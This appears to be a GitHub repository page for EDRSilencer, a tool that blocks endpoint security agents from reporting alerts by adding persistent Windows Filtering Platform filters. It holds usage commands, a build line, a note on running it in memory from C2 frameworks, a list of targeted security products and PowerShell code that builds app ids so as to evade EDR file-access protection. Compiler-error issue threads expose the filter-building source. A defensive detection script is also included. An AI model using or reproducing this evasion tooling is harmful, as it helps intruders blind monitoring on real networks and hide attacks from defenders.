netero1010 / edrsilencer
A tool that uses the Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to their server.

License: MIT License

Language: C

edrsilencer's Introduction

EDRSilencer

Inspired by FireBlock, the closed-source tool shipped with MdSec's NightHawk, I decided to write my own version. This tool blocks the outbound traffic of running EDR processes using Windows Filtering Platform (WFP) APIs.

This tool offers the following features:

  • Search for known running EDR processes and add WFP filters to block their outbound traffic
  • Add WFP filter for a specific process
  • Remove all WFP filters created by this tool
  • Remove a specific WFP filter by filter id
  • Can be run from a C2 framework through an in-memory PE execution module (e.g., BruteRatel's memexec)
  • Some EDR controls (e.g., a minifilter) deny access when a process attempts to obtain a file handle to one of the EDR's own process images (e.g., through CreateFileW). The FwpmGetAppIdFromFileName0 API, which is used to obtain the FWP app id of the targeted EDR process, calls CreateFileW internally. To avoid this, a custom FwpmGetAppIdFromFileName0 was implemented that constructs the app id without invoking CreateFileW, which prevents unexpected failures when adding a WFP filter for an EDR process
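
As an added illustration of the last point (example code written for this page, not EDRSilencer's own implementation), the PowerShell below builds the app id for an executable from its DOS path without opening the file. It assumes the format that netsh wfp show filters displays for such conditions: the app id is the image's NT device path (the drive letter resolved through QueryDosDevice to its \Device\HarddiskVolumeN link), lowercased, stored as a NUL-terminated UTF-16LE string whose FWP_BYTE_BLOB size includes the terminator. The function names and the sample path are the example's own.

```powershell
# Added example (not EDRSilencer code): build the FWPM_CONDITION_ALE_APP_ID value
# for an executable from its DOS path, without FwpmGetAppIdFromFileName0 and so
# without a CreateFileW on the target image. Assumed format: lowercase NT device
# path, UTF-16LE, NUL-terminated (the terminator counts towards the blob size).

Add-Type -Namespace Wfp -Name Native -MemberDefinition @'
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern uint QueryDosDevice(string lpDeviceName, System.Text.StringBuilder lpTargetPath, int ucchMax);
'@

function Get-NtDevicePath {
    param([Parameter(Mandatory)][string]$Path)
    if ($Path -match '^([A-Za-z]:)(\\.*)$') {
        $drive = $Matches[1]
        $rest  = $Matches[2]
    } else {
        throw "Expected a drive-letter path, got '$Path'"
    }
    # Resolve the DOS device link, e.g. C: -> \Device\HarddiskVolume3. The buffer
    # is a multi-string; StringBuilder marshalling keeps the first (current) entry.
    $sb = New-Object System.Text.StringBuilder 1024
    $n  = [Wfp.Native]::QueryDosDevice($drive, $sb, $sb.Capacity)
    if ($n -eq 0) {
        $err = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
        throw "QueryDosDevice($drive) failed with Win32 error $err"
    }
    return $sb.ToString() + $rest
}

function Get-WfpAppId {
    param([Parameter(Mandatory)][string]$Path)
    $nt    = (Get-NtDevicePath -Path $Path).ToLowerInvariant()
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($nt + [char]0)
    [pscustomobject]@{
        AsString = $nt             # what netsh prints as <asString>
        Size     = $bytes.Length   # FWP_BYTE_BLOB.size, including the NUL
        Data     = $bytes          # FWP_BYTE_BLOB.data
    }
}

# Usage: the path from the README's "block" example
$id = Get-WfpAppId -Path 'C:\Windows\System32\curl.exe'
'{0} ({1} bytes)' -f $id.AsString, $id.Size
($id.Data | ForEach-Object { $_.ToString('x2') }) -join ''
```

QueryDosDevice returns the drive's current symbolic-link target, so a subst drive (\??\...) or a mapped network drive (\Device\LanmanRedirector\...) will not yield a harddiskvolume path; EDR binaries live on the system drive, where the mapping is the plain volume link. Before relying on this on a new Windows build, compare the printed string with the asString value netsh shows for a filter that FwpmGetAppIdFromFileName0 created for the same file.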

The tool currently supports the following EDRs:

  • Microsoft Defender for Endpoint and Microsoft Defender Antivirus
  • Elastic EDR
  • Trellix EDR
  • Qualys EDR
  • SentinelOne
  • Cylance
  • Cybereason
  • Carbon Black EDR
  • Carbon Black Cloud
  • Tanium
  • Palo Alto Networks Traps/Cortex XDR
  • FortiEDR
  • Cisco Secure Endpoint (Formerly Cisco AMP)
  • ESET Inspect
  • Harfanglab EDR
  • TrendMicro Apex One

As I do not have access to all of these EDRs for testing, please do not hesitate to correct me if the listed processes (edrProcess in EDRSilencer.c) prove insufficient to block all alert, detection, or event-forwarding traffic.

Testing Environment

Tested on Windows 10 and Windows Server 2016

Usage

Usage: EDRSilencer.exe <blockedr/block/unblockall/unblock>
- Add WFP filters to block the IPv4 and IPv6 outbound traffic of all detected EDR processes:
  EDRSilencer.exe blockedr

- Add WFP filters to block the IPv4 and IPv6 outbound traffic of a specific process (full path is required):
  EDRSilencer.exe block "C:\Windows\System32\curl.exe"

- Remove all WFP filters applied by this tool:
  EDRSilencer.exe unblockall

- Remove a specific WFP filter based on filter id:
  EDRSilencer.exe unblock <filter id>

Compile

x86_64-w64-mingw32-gcc EDRSilencer.c utils.c -o EDRSilencer.exe -lfwpuclnt

Example

Detect and block the outbound traffic of running EDR processes

EDRSilencer.exe blockedr
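
The defender-side check that goes with this run: the "Blocking doesn't work" report in the issues below confirms the filters with netsh wfp show state, and the "Empty Provider" report notes that filters registered without a provider stand out. The PowerShell below (added for this page; not part of EDRSilencer) dumps the live filter set with netsh wfp show filters and lists every FWP_ACTION_BLOCK filter at the ALE_AUTH_CONNECT_V4/V6 layers that carries a single FWPM_CONDITION_ALE_APP_ID condition, which is the shape the compiler output in the issues shows the tool building. The XML element names (wfpdiag/filters/item, conditionValue/byteBlob/asString, flags/item) are assumed from dumps taken on Windows 10 and Server 2016; the script throws rather than returning an empty list if the layout differs.

```powershell
# Added example (not EDRSilencer code): find WFP filters shaped like the ones
# EDRSilencer adds, i.e. FWP_ACTION_BLOCK at ALE_AUTH_CONNECT_V4/V6 with one
# FWPM_CONDITION_ALE_APP_ID condition. Assumes the netsh "wfpdiag" XML layout;
# run from an elevated prompt.

function Get-NodeText {
    param([System.Xml.XmlNode]$Node, [string]$XPath)
    $n = $Node.SelectSingleNode($XPath)
    if ($null -eq $n) { return $null }
    return $n.InnerText
}

function Get-SuspiciousWfpBlockFilters {
    param(
        [string]$DumpPath = (Join-Path $env:TEMP 'wfp-filters.xml')
    )
    $layers = @('FWPM_LAYER_ALE_AUTH_CONNECT_V4', 'FWPM_LAYER_ALE_AUTH_CONNECT_V6')

    Remove-Item -LiteralPath $DumpPath -ErrorAction SilentlyContinue
    & netsh.exe wfp show filters "file=$DumpPath" | Out-Null
    if (-not (Test-Path -LiteralPath $DumpPath)) {
        throw "netsh did not write $DumpPath (not elevated?)"
    }

    [xml]$doc = Get-Content -LiteralPath $DumpPath -Raw
    $items = $doc.SelectNodes('/wfpdiag/filters/item')
    if ($items.Count -eq 0) {
        throw "No /wfpdiag/filters/item nodes in $DumpPath; the XML layout differs from the assumed one"
    }

    foreach ($f in $items) {
        if ((Get-NodeText $f 'action/type') -ne 'FWP_ACTION_BLOCK') { continue }
        $layer = Get-NodeText $f 'layerKey'
        if ($layers -notcontains $layer) { continue }

        # EDRSilencer-style filters carry exactly one ALE_APP_ID equality condition
        $conds = @($f.SelectNodes('filterCondition/item'))
        if ($conds.Count -ne 1) { continue }
        if ((Get-NodeText $conds[0] 'fieldKey') -ne 'FWPM_CONDITION_ALE_APP_ID') { continue }

        $provider = Get-NodeText $f 'providerKey'
        if ([string]::IsNullOrEmpty($provider)) { $provider = '<none>' }

        [pscustomobject]@{
            FilterId   = [uint64](Get-NodeText $f 'filterId')
            Name       = Get-NodeText $f 'displayData/name'
            Layer      = $layer
            AppId      = Get-NodeText $conds[0] 'conditionValue/byteBlob/asString'
            Persistent = [bool]$f.SelectSingleNode("flags/item[text()='FWPM_FILTER_FLAG_PERSISTENT']")
            Provider   = $provider
        }
    }
}

# Usage: list, then review. A block filter on an EDR image with no provider, or
# with a provider you did not register, is the finding to chase.
Get-SuspiciousWfpBlockFilters | Sort-Object AppId | Format-Table -AutoSize
```

Run it elevated; netsh needs administrative rights to export the filter set. The compiler output in the issues shows the tool setting FWPM_FILTER_FLAG_PERSISTENT, so these filters survive a reboot until something deletes them by filter id. If "Audit Filtering Platform Policy Change" is enabled, each addition also appears as Security event 5447 (a WFP filter has been changed), which gives a timeline the point-in-time dump cannot.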

Credits

https://www.mdsec.co.uk/2023/09/nighthawk-0-2-6-three-wise-monkeys/

edrsilencer's People

Contributors: logdumpster, netero1010

edrsilencer's Issues

Compilation failure

GCC version:

> x86_64-w64-mingw32-gcc --version                                          
x86_64-w64-mingw32-gcc (GCC) 9.3-win32 20200320
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Error log:

EDRSilencer.c: In function ‘BlockEdrProcessTraffic’:
EDRSilencer.c:106:5: warning: implicit declaration of function ‘FwpmEngineOpen0’ [-Wimplicit-function-declaration]
  106 |     FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
      |     ^~~~~~~~~~~~~~~
EDRSilencer.c:137:17: warning: implicit declaration of function ‘QueryFullProcessImageNameW’ [-Wimplicit-function-declaration]
  137 |                 QueryFullProcessImageNameW(hProcess, 0, fullPath, &size);
      |                 ^~~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:138:17: error: unknown type name ‘FWPM_FILTER_CONDITION0’
  138 |                 FWPM_FILTER_CONDITION0 cond;
      |                 ^~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:139:17: error: unknown type name ‘FWPM_FILTER0’
  139 |                 FWPM_FILTER0 filter = {0};
      |                 ^~~~~~~~~~~~
EDRSilencer.c:142:21: warning: implicit declaration of function ‘FwpmGetAppIdFromFileName0’ [-Wimplicit-function-declaration]
  142 |                 if (FwpmGetAppIdFromFileName0(fullPath, &appId) != ERROR_SUCCESS) {
      |                     ^~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:149:23: error: request for member ‘displayData’ in something not a structure or union
  149 |                 filter.displayData.name = filterName;
      |                       ^
EDRSilencer.c:150:23: error: request for member ‘flags’ in something not a structure or union
  150 |                 filter.flags = FWPM_FILTER_FLAG_PERSISTENT;
      |                       ^
EDRSilencer.c:151:23: error: request for member ‘layerKey’ in something not a structure or union
  151 |                 filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
      |                       ^
EDRSilencer.c:152:23: error: request for member ‘action’ in something not a structure or union
  152 |                 filter.action.type = FWP_ACTION_BLOCK;
      |                       ^
EDRSilencer.c:153:21: error: request for member ‘fieldKey’ in something not a structure or union
  153 |                 cond.fieldKey = FWPM_CONDITION_ALE_APP_ID;
      |                     ^
EDRSilencer.c:154:21: error: request for member ‘matchType’ in something not a structure or union
  154 |                 cond.matchType = FWP_MATCH_EQUAL;
      |                     ^
EDRSilencer.c:155:21: error: request for member ‘conditionValue’ in something not a structure or union
  155 |                 cond.conditionValue.type = FWP_BYTE_BLOB_TYPE;
      |                     ^
EDRSilencer.c:156:21: error: request for member ‘conditionValue’ in something not a structure or union
  156 |                 cond.conditionValue.byteBlob = appId;
      |                     ^
EDRSilencer.c:157:23: error: request for member ‘filterCondition’ in something not a structure or union
  157 |                 filter.filterCondition = &cond;
      |                       ^
EDRSilencer.c:158:23: error: request for member ‘numFilterConditions’ in something not a structure or union
  158 |                 filter.numFilterConditions = 1;
      |                       ^
EDRSilencer.c:164:26: warning: implicit declaration of function ‘FwpmFilterAdd0’ [-Wimplicit-function-declaration]
  164 |                 result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId);
      |                          ^~~~~~~~~~~~~~
EDRSilencer.c:171:23: error: request for member ‘layerKey’ in something not a structure or union
  171 |                 filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V6;
      |                       ^
EDRSilencer.c:179:17: warning: implicit declaration of function ‘FwpmFreeMemory0’ [-Wimplicit-function-declaration]
  179 |                 FwpmFreeMemory0((void**)&appId);
      |                 ^~~~~~~~~~~~~~~
EDRSilencer.c:191:5: warning: implicit declaration of function ‘FwpmEngineClose0’ [-Wimplicit-function-declaration]
  191 |     FwpmEngineClose0(hEngine);
      |     ^~~~~~~~~~~~~~~~
EDRSilencer.c: In function ‘BlockProcessTraffic’:
EDRSilencer.c:203:5: error: unknown type name ‘FWPM_FILTER_CONDITION0’
  203 |     FWPM_FILTER_CONDITION0 cond;
      |     ^~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:204:5: error: unknown type name ‘FWPM_FILTER0’
  204 |     FWPM_FILTER0 filter = {0};
      |     ^~~~~~~~~~~~
EDRSilencer.c:214:11: error: request for member ‘displayData’ in something not a structure or union
  214 |     filter.displayData.name = filterName;
      |           ^
EDRSilencer.c:215:11: error: request for member ‘flags’ in something not a structure or union
  215 |     filter.flags = FWPM_FILTER_FLAG_PERSISTENT;
      |           ^
EDRSilencer.c:216:11: error: request for member ‘layerKey’ in something not a structure or union
  216 |     filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
      |           ^
EDRSilencer.c:217:11: error: request for member ‘action’ in something not a structure or union
  217 |     filter.action.type = FWP_ACTION_BLOCK;
      |           ^
EDRSilencer.c:218:9: error: request for member ‘fieldKey’ in something not a structure or union
  218 |     cond.fieldKey = FWPM_CONDITION_ALE_APP_ID;
      |         ^
EDRSilencer.c:219:9: error: request for member ‘matchType’ in something not a structure or union
  219 |     cond.matchType = FWP_MATCH_EQUAL;
      |         ^
EDRSilencer.c:220:9: error: request for member ‘conditionValue’ in something not a structure or union
  220 |     cond.conditionValue.type = FWP_BYTE_BLOB_TYPE;
      |         ^
EDRSilencer.c:221:9: error: request for member ‘conditionValue’ in something not a structure or union
  221 |     cond.conditionValue.byteBlob = appId;
      |         ^
EDRSilencer.c:222:11: error: request for member ‘filterCondition’ in something not a structure or union
  222 |     filter.filterCondition = &cond;
      |           ^
EDRSilencer.c:223:11: error: request for member ‘numFilterConditions’ in something not a structure or union
  223 |     filter.numFilterConditions = 1;
      |           ^
EDRSilencer.c:236:11: error: request for member ‘layerKey’ in something not a structure or union
  236 |     filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V6;
      |           ^
EDRSilencer.c: In function ‘UnblockAllWfpFilters’:
EDRSilencer.c:254:5: error: unknown type name ‘FWPM_FILTER0’
  254 |     FWPM_FILTER0** filters;
      |     ^~~~~~~~~~~~
EDRSilencer.c:263:14: warning: implicit declaration of function ‘FwpmFilterCreateEnumHandle0’ [-Wimplicit-function-declaration]
  263 |     result = FwpmFilterCreateEnumHandle0(hEngine, NULL, &enumHandle);
      |              ^~~~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:270:18: warning: implicit declaration of function ‘FwpmFilterEnum0’ [-Wimplicit-function-declaration]
  270 |         result = FwpmFilterEnum0(hEngine, enumHandle, 1, &filters, &numFilters);
      |                  ^~~~~~~~~~~~~~~
EDRSilencer.c:274:13: warning: implicit declaration of function ‘FwpmFilterDestroyEnumHandle0’ [-Wimplicit-function-declaration]
  274 |             FwpmFilterDestroyEnumHandle0(hEngine, enumHandle);
      |             ^~~~~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:283:9: error: unknown type name ‘FWPM_DISPLAY_DATA0’
  283 |         FWPM_DISPLAY_DATA0 *data = &filters[0]->displayData;
      |         ^~~~~~~~~~~~~~~~~~
EDRSilencer.c:283:47: error: request for member ‘displayData’ in something not a structure or union
  283 |         FWPM_DISPLAY_DATA0 *data = &filters[0]->displayData;
      |                                               ^~
EDRSilencer.c:284:40: error: request for member ‘name’ in something not a structure or union
  284 |         WCHAR* currentFilterName = data->name;
      |                                        ^~
EDRSilencer.c:287:41: error: request for member ‘filterId’ in something not a structure or union
  287 |             UINT64 filterId = filters[0]->filterId;
      |                                         ^~
EDRSilencer.c:288:22: warning: implicit declaration of function ‘FwpmFilterDeleteById0’ [-Wimplicit-function-declaration]
  288 |             result = FwpmFilterDeleteById0(hEngine, filterId);
      |                      ^~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c: In function ‘UnblockWfpFilter’:
EDRSilencer.c:320:24: error: ‘FWP_E_FILTER_NOT_FOUND’ undeclared (first use in this function); did you mean ‘ERROR_FILE_NOT_FOUND’?
  320 |     else if (result == FWP_E_FILTER_NOT_FOUND) {
      |                        ^~~~~~~~~~~~~~~~~~~~~~
      |                        ERROR_FILE_NOT_FOUND
EDRSilencer.c:320:24: note: each undeclared identifier is reported only once for each function it appears in

Compile issue

I am attempting to compile your project for testing and am getting the issues below.

I cloned your project and, following the README, used x86_64-w64-mingw32-gcc EDRSilencer.c -o EDRSilencer.exe -lfwpuclnt utils.c to attempt to compile.

Any help getting the build environment set up correctly would be much appreciated.

My currently installed mingw packages:

~/EDRSilencer(main) » apt search mingw | grep installed                                                                                                                   11:31:09

WARNING: apt does not have a stable CLI interface. Use with caution in scripts.

binutils-mingw-w64-i686/focal,now 2.34-5ubuntu1+8.8 amd64 [installed,automatic]
binutils-mingw-w64-x86-64/focal,now 2.34-5ubuntu1+8.8 amd64 [installed,automatic]
g++-mingw-w64/focal,focal,now 9.3.0-7ubuntu1+22~exp1ubuntu4 all [installed,automatic]
g++-mingw-w64-i686/focal,now 9.3.0-7ubuntu1+22~exp1ubuntu4 amd64 [installed,automatic]
g++-mingw-w64-x86-64/focal,now 9.3.0-7ubuntu1+22~exp1ubuntu4 amd64 [installed,automatic]
gcc-mingw-w64/focal,focal,now 9.3.0-7ubuntu1+22~exp1ubuntu4 all [installed,automatic]
gcc-mingw-w64-base/focal,now 9.3.0-7ubuntu1+22~exp1ubuntu4 amd64 [installed,automatic]
gcc-mingw-w64-i686/focal,now 9.3.0-7ubuntu1+22~exp1ubuntu4 amd64 [installed,automatic]
gcc-mingw-w64-x86-64/focal,now 9.3.0-7ubuntu1+22~exp1ubuntu4 amd64 [installed,automatic]
gobjc-mingw-w64-x86-64/focal,now 9.3.0-7ubuntu1+22~exp1ubuntu4 amd64 [installed]
libnpth-mingw-w64-dev/focal,focal,now 1.6-1 all [installed]
mingw-w64/focal,focal,now 7.0.0-2 all [installed]
mingw-w64-common/focal,focal,now 7.0.0-2 all [installed]
mingw-w64-i686-dev/focal,focal,now 7.0.0-2 all [installed,automatic]
mingw-w64-tools/focal,now 7.0.0-2 amd64 [installed]
mingw-w64-x86-64-dev/focal,focal,now 7.0.0-2 all [installed,automatic]

~/EDRSilencer(main) »  x86_64-w64-mingw32-gcc --version
x86_64-w64-mingw32-gcc (GCC) 9.3-win32 20200320
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
~/EDRSilencer(main) »  x86_64-w64-mingw32-gcc EDRSilencer.c -o EDRSilencer.exe -lfwpuclnt utils.c
EDRSilencer.c: In function ‘GetProviderGUIDByDescription’:
EDRSilencer.c:128:5: error: unknown type name ‘FWPM_PROVIDER0’; did you mean ‘CRYPT_PROVIDERS’?
  128 |     FWPM_PROVIDER0** providers = NULL;
      |     ^~~~~~~~~~~~~~
      |     CRYPT_PROVIDERS
EDRSilencer.c:131:14: warning: implicit declaration of function ‘FwpmEngineOpen0’ [-Wimplicit-function-declaration]
  131 |     result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
      |              ^~~~~~~~~~~~~~~
EDRSilencer.c:137:14: warning: implicit declaration of function ‘FwpmProviderCreateEnumHandle0’ [-Wimplicit-function-declaration]
  137 |     result = FwpmProviderCreateEnumHandle0(hEngine, NULL, &enumHandle);
      |              ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:140:9: warning: implicit declaration of function ‘FwpmEngineClose0’ [-Wimplicit-function-declaration]
  140 |         FwpmEngineClose0(hEngine);
      |         ^~~~~~~~~~~~~~~~
EDRSilencer.c:144:14: warning: implicit declaration of function ‘FwpmProviderEnum0’ [-Wimplicit-function-declaration]
  144 |     result = FwpmProviderEnum0(hEngine, enumHandle, 100, &providers, &numProviders);
      |              ^~~~~~~~~~~~~~~~~
EDRSilencer.c:152:25: error: request for member ‘displayData’ in something not a structure or union
  152 |         if (providers[i]->displayData.description != NULL) {
      |                         ^~
EDRSilencer.c:153:36: error: request for member ‘displayData’ in something not a structure or union
  153 |             if (wcscmp(providers[i]->displayData.description, providerDescription) == 0) {
      |                                    ^~
EDRSilencer.c:154:48: error: request for member ‘providerKey’ in something not a structure or union
  154 |                 *outProviderGUID = providers[i]->providerKey;
      |                                                ^~
EDRSilencer.c:161:9: warning: implicit declaration of function ‘FwpmFreeMemory0’ [-Wimplicit-function-declaration]
  161 |         FwpmFreeMemory0((void**)&providers);
      |         ^~~~~~~~~~~~~~~
EDRSilencer.c:164:5: warning: implicit declaration of function ‘FwpmProviderDestroyEnumHandle0’ [-Wimplicit-function-declaration]
  164 |     FwpmProviderDestroyEnumHandle0(hEngine, enumHandle);
      |     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c: In function ‘BlockEdrProcessTraffic’:
EDRSilencer.c:208:17: error: unknown type name ‘FWPM_FILTER_CONDITION0’
  208 |                 FWPM_FILTER_CONDITION0 cond = {0};
      |                 ^~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:209:17: error: unknown type name ‘FWPM_FILTER0’
  209 |                 FWPM_FILTER0 filter = {0};
      |                 ^~~~~~~~~~~~
EDRSilencer.c:210:17: error: unknown type name ‘FWPM_PROVIDER0’; did you mean ‘CRYPT_PROVIDERS’?
  210 |                 FWPM_PROVIDER0 provider = {0};
      |                 ^~~~~~~~~~~~~~
      |                 CRYPT_PROVIDERS
EDRSilencer.c:215:17: warning: implicit declaration of function ‘QueryFullProcessImageNameW’ [-Wimplicit-function-declaration]
  215 |                 QueryFullProcessImageNameW(hProcess, 0, fullPath, &size);
      |                 ^~~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:216:32: warning: implicit declaration of function ‘FwpmGetAppIdFromFileName0’ [-Wimplicit-function-declaration]
  216 |                 DWORD result = FwpmGetAppIdFromFileName0(fullPath, &appId);
      |                                ^~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:225:23: error: request for member ‘displayData’ in something not a structure or union
  225 |                 filter.displayData.name = filterName;
      |                       ^
EDRSilencer.c:226:23: error: request for member ‘flags’ in something not a structure or union
  226 |                 filter.flags = FWPM_FILTER_FLAG_PERSISTENT;
      |                       ^
EDRSilencer.c:227:23: error: request for member ‘layerKey’ in something not a structure or union
  227 |                 filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
      |                       ^
EDRSilencer.c:228:23: error: request for member ‘action’ in something not a structure or union
  228 |                 filter.action.type = FWP_ACTION_BLOCK;
      |                       ^
EDRSilencer.c:229:21: error: request for member ‘fieldKey’ in something not a structure or union
  229 |                 cond.fieldKey = FWPM_CONDITION_ALE_APP_ID;
      |                     ^
EDRSilencer.c:230:21: error: request for member ‘matchType’ in something not a structure or union
  230 |                 cond.matchType = FWP_MATCH_EQUAL;
      |                     ^
EDRSilencer.c:231:21: error: request for member ‘conditionValue’ in something not a structure or union
  231 |                 cond.conditionValue.type = FWP_BYTE_BLOB_TYPE;
      |                     ^
EDRSilencer.c:232:21: error: request for member ‘conditionValue’ in something not a structure or union
  232 |                 cond.conditionValue.byteBlob = appId;
      |                     ^
EDRSilencer.c:233:23: error: request for member ‘filterCondition’ in something not a structure or union
  233 |                 filter.filterCondition = &cond;
      |                       ^
EDRSilencer.c:234:23: error: request for member ‘numFilterConditions’ in something not a structure or union
  234 |                 filter.numFilterConditions = 1;
      |                       ^
EDRSilencer.c:238:27: error: request for member ‘providerKey’ in something not a structure or union
  238 |                     filter.providerKey = &providerGuid;
      |                           ^
EDRSilencer.c:240:29: error: request for member ‘displayData’ in something not a structure or union
  240 |                     provider.displayData.name = providerName;
      |                             ^
EDRSilencer.c:241:29: error: request for member ‘displayData’ in something not a structure or union
  241 |                     provider.displayData.description = providerDescription;
      |                             ^
EDRSilencer.c:242:29: error: request for member ‘flags’ in something not a structure or union
  242 |                     provider.flags = FWPM_PROVIDER_FLAG_PERSISTENT;
      |                             ^
EDRSilencer.c:243:30: warning: implicit declaration of function ‘FwpmProviderAdd0’ [-Wimplicit-function-declaration]
  243 |                     result = FwpmProviderAdd0(hEngine, &provider, NULL);
      |                              ^~~~~~~~~~~~~~~~
EDRSilencer.c:248:35: error: request for member ‘providerKey’ in something not a structure or union
  248 |                             filter.providerKey = &providerGuid;
      |                                   ^
EDRSilencer.c:254:26: warning: implicit declaration of function ‘FwpmFilterAdd0’ [-Wimplicit-function-declaration]
  254 |                 result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId);
      |                          ^~~~~~~~~~~~~~
EDRSilencer.c:261:23: error: request for member ‘layerKey’ in something not a structure or union
  261 |                 filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V6;
      |                       ^
EDRSilencer.c: In function ‘BlockProcessTraffic’:
EDRSilencer.c:291:5: error: unknown type name ‘FWPM_FILTER_CONDITION0’
  291 |     FWPM_FILTER_CONDITION0 cond = {0};
      |     ^~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:292:5: error: unknown type name ‘FWPM_FILTER0’
  292 |     FWPM_FILTER0 filter = {0};
      |     ^~~~~~~~~~~~
EDRSilencer.c:293:5: error: unknown type name ‘FWPM_PROVIDER0’; did you mean ‘CRYPT_PROVIDERS’?
  293 |     FWPM_PROVIDER0 provider = {0};
      |     ^~~~~~~~~~~~~~
      |     CRYPT_PROVIDERS
EDRSilencer.c:312:11: error: request for member ‘displayData’ in something not a structure or union
  312 |     filter.displayData.name = filterName;
      |           ^
EDRSilencer.c:313:11: error: request for member ‘flags’ in something not a structure or union
  313 |     filter.flags = FWPM_FILTER_FLAG_PERSISTENT;
      |           ^
EDRSilencer.c:314:11: error: request for member ‘layerKey’ in something not a structure or union
  314 |     filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
      |           ^
EDRSilencer.c:315:11: error: request for member ‘action’ in something not a structure or union
  315 |     filter.action.type = FWP_ACTION_BLOCK;
      |           ^
EDRSilencer.c:316:9: error: request for member ‘fieldKey’ in something not a structure or union
  316 |     cond.fieldKey = FWPM_CONDITION_ALE_APP_ID;
      |         ^
EDRSilencer.c:317:9: error: request for member ‘matchType’ in something not a structure or union
  317 |     cond.matchType = FWP_MATCH_EQUAL;
      |         ^
EDRSilencer.c:318:9: error: request for member ‘conditionValue’ in something not a structure or union
  318 |     cond.conditionValue.type = FWP_BYTE_BLOB_TYPE;
      |         ^
EDRSilencer.c:319:9: error: request for member ‘conditionValue’ in something not a structure or union
  319 |     cond.conditionValue.byteBlob = appId;
      |         ^
EDRSilencer.c:320:11: error: request for member ‘filterCondition’ in something not a structure or union
  320 |     filter.filterCondition = &cond;
      |           ^
EDRSilencer.c:321:11: error: request for member ‘numFilterConditions’ in something not a structure or union
  321 |     filter.numFilterConditions = 1;
      |           ^
EDRSilencer.c:325:15: error: request for member ‘providerKey’ in something not a structure or union
  325 |         filter.providerKey = &providerGuid;
      |               ^
EDRSilencer.c:327:17: error: request for member ‘displayData’ in something not a structure or union
  327 |         provider.displayData.name = providerName;
      |                 ^
EDRSilencer.c:328:17: error: request for member ‘displayData’ in something not a structure or union
  328 |         provider.displayData.description = providerDescription;
      |                 ^
EDRSilencer.c:329:17: error: request for member ‘flags’ in something not a structure or union
  329 |         provider.flags = FWPM_PROVIDER_FLAG_PERSISTENT;
      |                 ^
EDRSilencer.c:335:23: error: request for member ‘providerKey’ in something not a structure or union
  335 |                 filter.providerKey = &providerGuid;
      |                       ^
EDRSilencer.c:348:11: error: request for member ‘layerKey’ in something not a structure or union
  348 |     filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V6;
      |           ^
EDRSilencer.c: In function ‘UnblockAllWfpFilters’:
EDRSilencer.c:366:5: error: unknown type name ‘FWPM_FILTER0’
  366 |     FWPM_FILTER0** filters = NULL;
      |     ^~~~~~~~~~~~
EDRSilencer.c:376:14: warning: implicit declaration of function ‘FwpmFilterCreateEnumHandle0’ [-Wimplicit-function-declaration]
  376 |     result = FwpmFilterCreateEnumHandle0(hEngine, NULL, &enumHandle);
      |              ^~~~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:383:18: warning: implicit declaration of function ‘FwpmFilterEnum0’ [-Wimplicit-function-declaration]
  383 |         result = FwpmFilterEnum0(hEngine, enumHandle, 1, &filters, &numFilters);
      |                  ^~~~~~~~~~~~~~~
EDRSilencer.c:387:13: warning: implicit declaration of function ‘FwpmFilterDestroyEnumHandle0’ [-Wimplicit-function-declaration]
  387 |             FwpmFilterDestroyEnumHandle0(hEngine, enumHandle);
      |             ^~~~~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:396:9: error: unknown type name ‘FWPM_DISPLAY_DATA0’
  396 |         FWPM_DISPLAY_DATA0 *data = &filters[0]->displayData;
      |         ^~~~~~~~~~~~~~~~~~
EDRSilencer.c:396:47: error: request for member ‘displayData’ in something not a structure or union
  396 |         FWPM_DISPLAY_DATA0 *data = &filters[0]->displayData;
      |                                               ^~
EDRSilencer.c:397:40: error: request for member ‘name’ in something not a structure or union
  397 |         WCHAR* currentFilterName = data->name;
      |                                        ^~
EDRSilencer.c:400:41: error: request for member ‘filterId’ in something not a structure or union
  400 |             UINT64 filterId = filters[0]->filterId;
      |                                         ^~
EDRSilencer.c:401:22: warning: implicit declaration of function ‘FwpmFilterDeleteById0’ [-Wimplicit-function-declaration]
  401 |             result = FwpmFilterDeleteById0(hEngine, filterId);
      |                      ^~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:411:18: warning: implicit declaration of function ‘FwpmProviderDeleteByKey0’ [-Wimplicit-function-declaration]
  411 |         result = FwpmProviderDeleteByKey0(hEngine, &providerGuid);
